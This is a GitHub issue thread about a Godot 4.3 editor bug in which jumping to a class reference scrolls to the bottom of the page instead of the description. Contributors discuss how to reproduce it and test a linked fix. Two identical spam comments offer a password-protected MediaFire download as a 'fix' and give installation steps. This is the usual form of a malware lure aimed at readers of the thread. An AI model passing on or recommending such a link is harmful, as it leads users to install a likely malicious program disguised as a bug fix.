### ISSUE TITLE
Jumping to editor help does not scroll correctly sometimes

### ISSUE THREAD

**Issue by Maran23** [godotengine/godot#96448]
### Tested versions

- Godot v4.3.stable
- https://github.com/godotengine/godot/commit/61598c5c88d95b96811d386cb20d714c35f4c6d7

### System information

Godot v4.3.stable - Windows 10.0.19045 - Vulkan (Forward+) - dedicated AMD Radeon RX 6900 XT (Advanced Micro Devices, Inc.; 32.0.11037.4004) - AMD Ryzen 9 5900X 12-Core Processor (24 Threads)

### Issue description

Even after the fix for https://github.com/godotengine/godot/issues/88281, the editor help description scolling does not work sometimes. You need some tries, but it will not work eventually.

### Steps to reproduce

- CTRL + Click onto a symbol to go into the editor help
- It will scroll to the bottom instead to the description. Always works the second time though

![unknown_2024 09 02-00 20_1](https://github.com/user-attachments/assets/22bd29cb-0dc3-4e8c-aab3-a5593fc6ee23)

### Minimal reproduction project (MRP)

editor

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by anvilfolk** [comment]
I tried replicating so I could test the fixing PR, this but can't seem to - appears to work from the first time. Is there something specific to what you're clicking perhaps?

**Comment by Maran23** [comment]
> I tried replicating so I could test the fixing PR, this but can't seem to - appears to work from the first time. Is there something specific to what you're clicking perhaps?

I can reproduce it somewhat reliable when the documentation was not opened before and when opening a big document like e.g. Node, e.g. the get_parent() method.

**Comment by ydeltastar** [comment]
It happens for the first time any class reference is open after starting the editor. Jumping again to the same class reference works as expected.
If you close the class reference page in the script editor, it will scroll to the end when jumping again when jumping.

**Comment by anvilfolk** [comment]
https://github.com/user-attachments/assets/e6a9f949-d21a-4e5f-b8f0-b77230828ac9

I really cannot replicate it on 4.3 stable on Win11. I wanted to test the linked PR but can't. For those who can replicate the issue, maybe you can go there, try the PR and make sure it has fixed it for you!

**Comment by Maran23** [comment]
> I really cannot replicate it on 4.3 stable on Win11. I wanted to test the linked PR but can't. For those who can replicate the issue, maybe you can go there, try the PR and make sure it has fixed it for you!

You can try with a debug build, as that is less opimized and slower.

**Comment by Maran23** [comment]
Duplicate issue: https://github.com/godotengine/godot/issues/96515 maybe someone from there can test that

**Comment by Maran23** [comment]
For anyone who wants to test this, rebased the branch to master, you can download it here: https://github.com/godotengine/godot/pull/96449/checks

**Comment by KoBeWi** [comment]
Also can't reproduce, in 4.4.
The page takes a while to load after opening, but once loading finishes, the editor jumps to correct position.
